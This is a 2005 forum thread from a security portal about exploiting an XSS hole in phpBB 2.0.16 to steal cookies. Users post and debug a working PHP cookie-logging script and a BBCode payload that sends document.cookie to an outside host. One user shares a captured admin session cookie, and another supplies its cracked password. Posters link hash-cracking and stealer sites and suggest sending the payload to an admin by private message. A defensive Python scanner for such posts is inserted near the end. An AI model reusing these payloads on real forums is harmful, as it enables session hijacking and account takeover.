Waraxe IT Security Portal  
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit (forum thread, page 2 of 8)

Posted: Sun Jul 10, 2005 1:05 pm
subzero (Valuable expert)
Joined: Mar 16, 2005
Posts: 42

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>

how about this one ?
rename it to cookies.php

and try to access it by http://mysite.com/cookies.php
and see what you have inside http://mysite.com/cookies.txt

;0

Posted: Sun Jul 10, 2005 1:14 pm
subzero (Valuable expert)
Joined: Mar 16, 2005
Posts: 42

using the code above.. rename it to cookies.php.. or whatever you want.


Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


have fun

Posted: Sun Jul 10, 2005 1:15 pm
verbatim (Regular user)
Joined: Jul 09, 2005
Posts: 11

when i call http://mysite.com/cookies.php
there's in cookies.txt :
Code:
Cookie: <br> IP: [color=#FF0000]myIP[/color]<br> Date and Time: 10 July, 2005, 3:11 pm<br> Referer: <br><br><br>


but when i try to use the exploit with this new cookies.php :
Quote:
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite.com/cookies.php'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'


the cookies.txt is empty :(

edit : i tried the syntax you gave while i was posting :

Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]




And now it's working, great job subzero, i'd say you're certainly above (zero ;) ).

Posted: Sun Jul 10, 2005 1:30 pm
subzero (Valuable expert)
Joined: Mar 16, 2005
Posts: 42

Good then

only diff for that code was cookies.php?c=

happy hunting ;P pal

Posted: Sun Jul 10, 2005 2:25 pm
WaterBird (Active user)
Joined: May 16, 2005
Posts: 37

Ok i have something like this


REFERER=http://www.site.net/nothing/phpBB2/viewtopic.php?t=2
QUERY=phpbb2mysql_t=a:2:{i:1;i:1121004937;i:2;i:1121005196;}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c2150783216c11afea291d179e7b1902";s:6:"userid";s:1:"2";}; phpbb2mysql_sid=b57ae9f7898f1ccebf7e07fa427e5998
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

now what ? by what program/viewer i can use this cookie ?


c2150783216c11afea291d179e7b1902 is md5 hash ?


Last edited by WaterBird on Sun Jul 10, 2005 2:39 pm; edited 1 time in total

Posted: Sun Jul 10, 2005 2:37 pm
verbatim (Regular user)
Joined: Jul 09, 2005
Posts: 11

the password of this user : dupa400

Posted: Sun Jul 10, 2005 2:40 pm
WaterBird (Active user)
Joined: May 16, 2005
Posts: 37

verbatim wrote:
the password of this user : dupa400



Yea i know, i'm just testing the exploit. Is there any possibility to do a jpg cookie stealer ? So i don't have to use

http://www.antichat.ru/sniff/log.php
and
http://antichat.ru/cgi-bin/s.jpg

?? Any ideas ?

Posted: Sun Jul 10, 2005 2:51 pm
verbatim (Regular user)
Joined: Jul 09, 2005
Posts: 11

a "jpg cookie stealer" can't exist, because jpg is no executable... i presume antichat.ru redirects (with .htaccess) http://antichat.ru/cgi-bin/s.jpg to the real stealer script.

if you want to use your own stealer script, you just have to read my discussion with subzero, the answer is in. ;)

Posted: Sun Jul 10, 2005 2:57 pm
WaterBird (Active user)
Joined: May 16, 2005
Posts: 37

verbatim wrote:
a "jpg cookie stealer" can't exist, because jpg is no executable... i presume antichat.ru redirects (with .htaccess) http://antichat.ru/cgi-bin/s.jpg to the real stealer script.

if you want to use your own stealer script, you just have to read my discussion with subzero, the answer is in. ;)

Yep i have tried that one, my cookie is empty !

Done the php file with

Code:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>


in same directory/path created empty cookies.txt file with CHMOD 777

and in post i add

Code:

[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.site.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


And when i see the post on admin account file cookies.txt is still empty. Any ideas ?

Posted: Sun Jul 10, 2005 3:10 pm
subzero (Valuable expert)
Joined: Mar 16, 2005
Posts: 42

i think you using mozilla ?? others than IE ?

i have no problem to see my own hash and i'm sure verbatim doesn't have a problem too ;)

about the hash pass.

found an online site that do cracking for u.
http://sarcaprj.wayreth.eu.org/

Posted: Sun Jul 10, 2005 3:13 pm
WaterBird (Active user)
Joined: May 16, 2005
Posts: 37

subzero wrote:
i think you using mozilla ?? others than IE ?

i have no problem to see my own hash and i'm sure verbatim doesn't have a problem too ;)

about the hash pass.

found an online site that do cracking for u.
http://sarcaprj.wayreth.eu.org/



Thx for hash pass cracker but i still don't understand why this php doesn't want to work. i have entered it by typing the url in to my ie and i get:

Code:

Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@site.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.


Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


--------------------------------------------------------------------------------

Apache/1.3.33 Server at www.site.com Port 80





server info

Code:

Operating system   FreeBSD   
Service Status   Click to View   
Kernel version   4.11-STABLE   
Machine Type   i386   
Apache version   1.3.33 (Unix)   
PERL version   5.8.5   
Path to PERL   /usr/bin/perl   
Path to sendmail   /usr/sbin/sendmail   
Installed Perl Modules   Click to View   
PHP version   4.3.10   
MySQL version   4.0.18   
cPanel Build   10.2.0-CURRENT 89   
Theme   cPanel X v2.5.0    
Documentation   Click to View   
cPanel Pro   1.0 (RC26)

Posted: Sun Jul 10, 2005 3:32 pm
subzero (Valuable expert)
Joined: Mar 16, 2005
Posts: 42

Code:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>


rename to cookies.php

and make new one cookies.txt

with chmod 777 inside the same directory.
i put mine in root directory /

mmm good luck.

Posted: Sun Jul 10, 2005 3:52 pm
WaterBird (Active user)
Joined: May 16, 2005
Posts: 37

ok i have put this php file in root directory and it's working thx :}
Btw to all interested: maybe you know it, but you don't have to post in topic or do a new one, you can just send a msg to admin and paste the code in the msg :}

Cheers and thx for help !! Many thx !

Posted: Sun Jul 10, 2005 5:39 pm
WaterBird (Active user)
Joined: May 16, 2005
Posts: 37

Btw any idea how to fix this hole ? Phpbb don't know about it yet ?
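
Added example (not part of the thread and not phpBB's own fix): one way a forum administrator can look for this string in stored posts and private messages is to flag [url] tags that are nested or whose argument contains quote characters, a style attribute or a CSS expression( call, all of which the BBCode posted above depends on. The indicator names and the sample rows are constructed for illustration.

```python
import re

# Any [url], [url=...] or [/url] tag; group 2 is the argument after "=".
URL_TAG = re.compile(r"\[(/?)url(?:=([^\]]*))?\]", re.IGNORECASE)

# Content that does not belong in a URL argument but that the BBCode in
# this thread depends on (hypothetical indicator names).
ARG_CHECKS = {
    "quote-in-url-arg": re.compile(r"['\"`]"),
    "style-attr-in-url-arg": re.compile(r"style\s*=", re.IGNORECASE),
    # CSS expression() is evaluated as script by Internet Explorer.
    "css-expression": re.compile(r"expression\s*\(", re.IGNORECASE),
}


def scan_post(text):
    """Return the sorted indicator names found in one post or message body."""
    findings = set()
    depth = 0  # number of [url] tags currently open
    for match in URL_TAG.finditer(text):
        closing, arg = match.group(1), match.group(2)
        if closing:
            depth = max(depth - 1, 0)
            continue
        if depth > 0:
            findings.add("nested-url-tag")
        depth += 1
        for name, pattern in ARG_CHECKS.items():
            if arg and pattern.search(arg):
                findings.add(name)
    return sorted(findings)


def scan_posts(posts):
    """posts: iterable of (post_id, text); returns {post_id: findings} for hits."""
    return {pid: hits for pid, text in posts if (hits := scan_post(text))}


# Constructed sample rows; the script body of the second one is elided.
SAMPLE_POSTS = [
    (1, "[url=http://www.example.com/viewtopic.php?t=2]see this topic[/url]"),
    (2, "[url]www.ut[url=www.s=''style='top:expression(...)'][/url][/url]"),
    (3, "[url]http://www.example.com/[/url] [url]http://www.example.org/[/url]"),
]

if __name__ == "__main__":
    for post_id, hits in scan_posts(SAMPLE_POSTS).items():
        print(post_id, ", ".join(hits))
```

Hits are candidates for manual review rather than proof, since a legitimate link can contain an apostrophe.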

Posted: Sun Jul 10, 2005 5:48 pm
700G (Active user)
Joined: Mar 25, 2005
Posts: 33

Works very good :D